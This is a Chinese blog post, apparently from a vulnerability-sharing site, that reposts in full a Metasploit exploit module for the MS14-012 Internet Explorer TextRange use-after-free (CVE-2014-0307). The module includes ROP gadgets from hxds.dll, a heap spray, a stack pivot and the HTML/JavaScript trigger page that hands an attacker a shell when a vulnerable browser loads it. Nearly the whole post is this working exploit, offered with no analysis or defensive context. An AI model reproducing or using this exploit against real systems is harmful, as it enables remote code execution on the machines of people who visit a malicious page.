2014最新IE漏洞 ms14_012

  • A+
所属分类:漏洞时代
摘要

依旧是MSF模块
[php]
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
##

依旧是MSF模块
<br /> ##<br /> # This module requires Metasploit: http//metasploit.com/download<br /> # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]<br /> ##</p><p>require 'msf/core'</p><p>class Metasploit3 < Msf::Exploit::Remote<br /> Rank = NormalRanking</p><p>include Msf::Exploit::Remote::BrowserExploitServer</p><p>def initialize(info={})<br /> super(update_info(info,<br /> 'Name' => "MS14-012 Internet Explorer TextRange Use-After-Free",<br /> 'Description' => %q{<br /> This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw<br /> was most likely introduced back in 2013, therefore only certain builds of MSHTML are<br /> affected. In our testing with IE9, these vulnerable builds appear to be between<br /> 9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014<br /> (before the patch).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Jason Kratzer', # Original discovery<br /> 'sinn3r' # Port<br /> ],<br /> 'References' =><br /> [<br /> [ 'CVE', '2014-0307' ],<br /> [ 'MSB', 'MS14-012' ]<br /> ],<br /> 'Platform' => 'win',<br /> 'BrowserRequirements' =><br /> {<br /> :source => /script/i,<br /> :os_name => OperatingSystems::WINDOWS,<br /> :ua_name => HttpClients::IE,<br /> :office => "2010"<br /> #:ua_ver => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now<br /> },<br /> 'Targets' =><br /> [<br /> [<br /> 'Automatic',<br /> {<br /> # mov eax,dword ptr [edx+0C4h]; call eax<br /> 'Pivot' => 0x0c0d1020 # ECX<br /> }<br /> ]<br /> ],<br /> 'Payload' =><br /> {<br /> 'BadChars' => "/x00",<br /> 'PrependEncoder' => "/x81/xc4/x0c/xfe/xff/xff" # add esp, -500<br /> },<br /> 'DefaultOptions' =><br /> {<br /> 'Retries' => false, # You're too kind, tab recovery, I only need 1 shell.<br /> 'InitialAutoRunScript' => 'migrate -f'<br /> },<br /> 'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday<br /> 'DefaultTarget' => 0))<br /> end</p><p># hxds.dll<br /> def get_payload<br /> setup =<br /> [<br /> 0x51C3B376, # rop nop<br /> 0x51C2046E, # pop edi; ret<br /> 0x51BE4A41, # xchg eax, esp; ret<br /> ].pack("V*")</p><p># rop nops<br /> 45.times { setup << [0x51C3B376].pack('V*') }</p><p>setup << [<br /> 0x51C2046E, # pop edi ; ret<br /> 0x51BD28D4 # mov eax, [ecx], call [eax+8]<br /> ].pack('V*')</p><p>p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})</p><p>Rex::Text.to_unescape(p)<br /> end</p><p>def exploit_html<br /> template = %Q|<!DOCTYPE html></p><html> <head> <meta http-equiv='Cache-Control' content='no-cache'/> <meta http-equiv="X-UA-Compatible" content="IE=edge" > <script> <%=js_property_spray%> sprayHeap({shellcode:unescape("<%=get_payload%>")}); function hxds() { try { location.href = 'ms-help:'; } catch(e) {} } function strike() { hxds(); var fake = ""; for (var i = 0; i < 12; i++) { if (i==0) { fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>"); } else { fake += "//u4141//u4141"; } } var elements = [ 'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG', 'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION' ]; for (var i = 0; i < elements.length; i++) { var element = document.createElement(elements[i]); document.body.appendChild(element); } var tRange = document.body.createTextRange(); tRange.moveToElementText(document.body.children[16]); tRange.execCommand('InsertInputSubmit', true, null); tRange.moveToElementText(document.body.children[0]); tRange.moveEnd('character',4); tRange.execCommand('InsertOrderedList', true, null); tRange.select(); tRange.moveToElementText(document.body.children[0]); tRange.moveEnd('character',13); tRange.execCommand('Underline', true, null); tRange.execCommand('RemoveFormat', true, null); var fillObject = document.createElement('button'); fillObject.className = fake; } </script> </head> <body onload='strike();'></body> </html><p>|</p><p>return template, binding()<br /> end</p><p>def on_request_exploit(cli, request, target_info)<br /> send_exploit_html(cli, exploit_html)<br /> end</p><p>end

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: